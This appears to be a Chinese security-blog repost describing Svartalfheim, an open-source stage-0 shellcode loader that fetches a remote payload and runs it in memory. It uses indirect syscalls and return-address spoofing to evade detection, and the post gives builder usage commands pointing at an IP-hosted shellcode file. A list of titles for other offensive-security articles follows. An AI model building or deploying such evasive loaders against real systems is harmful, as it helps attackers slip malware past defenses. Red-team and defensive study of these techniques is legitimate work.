Svartalfheim - 使用间接系统调用和返回地址欺骗下载远程有效负载并在内存中执行的第 0 阶段 Shellcode

科技 2024-12-19 14:31 广东

第 0 阶段 Shellcode 下载远程有效负载并在内存中执行

Nt API 调用 NtAllocateVirtualMemory 是 NtProtectVirtualMemory 使用间接系统调用进行的。

LoadLibraryA 并且 WinHTTP 调用是通过返回地址欺骗执行的。

用法

Option	Description	Required	Default Value
-e	Http endpoint	Yes
-u	Http uri	Yes
-p	Http port	Yes
-a	User agent	No	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-s	Use TLS	No	Empty

例子：

python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 80
python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 443 -s

Credit

https://github.com/kyleavery/AceLdr
https://github.com/realoriginal/titanldr-ng
https://www.unknowncheats.me/forum/anti-cheat-bypass/268039-x64-return-address-spoofing-source-explanation.html
https://github.com/trickster0/TartarusGate

项目地址：

https://github.com/NtDallas/Svartalfheim

感谢您抽出

来阅读本文

点它，分享点赞在看都在这里

Ots安全

持续发展共享方向：威胁情报、漏洞情报、恶意分析、渗透技术（工具）等，不会回复任何私信，感谢关注。

最新文章

隐藏有效负载：在图像文件中嵌入Shellcode

Svartalfheim - 使用间接系统调用和返回地址欺骗下载远程有效负载并在内存中执行的第 0 阶段 Shellcode

攻击者利用 Microsoft Teams 和 AnyDesk 部署 DarkGate 恶意软件

从剪贴板到入侵：PowerShell自攻

自动化漏洞利用工程：从理论到实践的旅程

使用 Android 应用检测 ARP 欺骗攻击

俄罗斯招募乌克兰未成年人参与网络行动和侦察

通过 CVE-2024-52875 攻击 Kerio Control：从 CRLF 注入到一键 RCE

通过 JAAS 进行 Databricks JDBC 攻击

CVE-2024-38819：Spring 框架路径遍历 PoC 漏洞已发布

知名开源生物医学工具（InVesalius 3.1）存在远程代码执行漏洞 CVE-2024-42845

通过云端入侵汽车摄像头

CVE-2024-45337：Golang 加密库存在缺陷，存在授权绕过风险

2024 年回顾 - 朝鲜威胁行为者活动

伊朗黑客利用IOCONTROL恶意软件攻击美国和以色列的物联网和运营技术设备

新型 OT/IoT 网络武器：IOCONTROL

MyQ 打印服务器未经身份验证的 RCE (CVE-2024-28059)

恶意软件简史（第 4 部分）

黑客关天峰被美国指控利用零日漏洞感染全球8万多个防火墙设备，其中包括美国某机构使用的防火墙设备

新型 DCOM 横向移动攻击，忘记 PSEXEC：DCOM 上传并执行后门

利用 Spring Boot 3.4.0 属性进行远程代码执行

（QR）用代码解决问题：浏览器隔离环境中的 C2

LexiCrypt是一种 shellcode 混淆和编码工具

Apache Tomcat DoS 漏洞 (CVE-2024-24549)

Sophos MDR 追踪针对印度组织的 Mimic 勒索软件活动

隐藏在显眼的地方：Linux 中针对 `/proc` 文件系统操纵的技术和防御

以太坊攻击马拉松祝你好运 - 祝你狩猎愉快！

CVE-2024-55563：交易中继干扰漏洞对比特币闪电网络构成威胁

Windows 零日漏洞 CVE-2024-38193 在野外被利用：PoC 发布

EarlyBird 技术：一种先进的恶意软件规避策略

通过 NTLM 强制进行层次结构接管并中继到远程站点数据库上的 MSSQL

Shadow Dumper 是一款用于转储 LSASS 内存的强大工具，渗透测试和红队测试中经常用到

EDR 规避：利用硬件断点的新技术 – Blindside

制作一个可以绕过 Defender 的 Powershell Shellcode 下载器（无需绕过 Amsi）

新的 Windows 零日漏洞暴露 NTLM 凭据，已获得非官方补丁

研究人员发现流行开源机器学习框架的缺陷

研究人员在 Solana 流行的 Web3.js npm 库中发现后门

[漏洞] CVE-2024-44308：Apple Safari JavaScriptCore 远程代码执行漏洞

运行 SSH 蜜罐 30 天后会得到什么

混淆 Office 宏以逃避 Defender

新型网络钓鱼活动利用损坏的 Word 文档来逃避安全保护

CVE-2024-42448 (CVSS 9.9)：Veeam VSPC 中的严重 RCE 漏洞

剖析 JA4H 以改进 Sliver C2 检测

Linux 恶意软件开发：使用 Python 构建基于 TLS/SSL 的反向 shell

Windows 工具被武器化：Wevtutil.exe 在新型攻击中被利用

从 Base64 到反向 Shell：从 Word 文档中解压恶意软件

Windows Server 2012 用户注意：0day 漏洞可绕过 Web 安全标志

本文总结了如何将 Cobalt Strike 的 UDRL、SleepMask 和 BeaconGate 结合满足调用堆栈欺骗

俄罗斯逮捕勒索软件攻击者 Wazawaka

分类

时事

民生

政务

教育

文化

科技

财富

体娱

健康

情感

旅行

百科

职场

楼市

企业

乐活

学术

汽车

时尚

创业

美食

幽默

美体

文摘

原创标签

时事社会财经军事教育体育科技汽车科学房产搞笑综艺明星音乐动漫游戏时尚健康旅游美食生活摄影宠物职场育儿情感小说曲艺文化历史三农文学娱乐电影视频图片新闻宗教电视剧纪录片广告创意壁纸头像心灵鸡汤星座命理教育培训艺术文化金融财经健康医疗美妆时尚餐饮美食母婴育儿社会新闻工业农业时事政治星座占卜幽默笑话独立短篇连载作品文化历史科技互联网

发布位置

广东北京山东江苏河南浙江山西福建河北上海四川陕西湖南安徽湖北内蒙古江西云南广西甘肃辽宁黑龙江贵州新疆重庆吉林天津海南青海宁夏西藏香港澳门台湾美国加拿大澳大利亚日本新加坡英国西班牙新西兰韩国泰国法国德国意大利缅甸菲律宾马来西亚越南荷兰柬埔寨俄罗斯巴西智利卢森堡芬兰瑞典比利时瑞士土耳其斐济挪威朝鲜尼日利亚阿根廷匈牙利爱尔兰印度老挝葡萄牙乌克兰印度尼西亚哈萨克斯坦塔吉克斯坦希腊南非蒙古奥地利肯尼亚加纳丹麦津巴布韦埃及坦桑尼亚捷克阿联酋安哥拉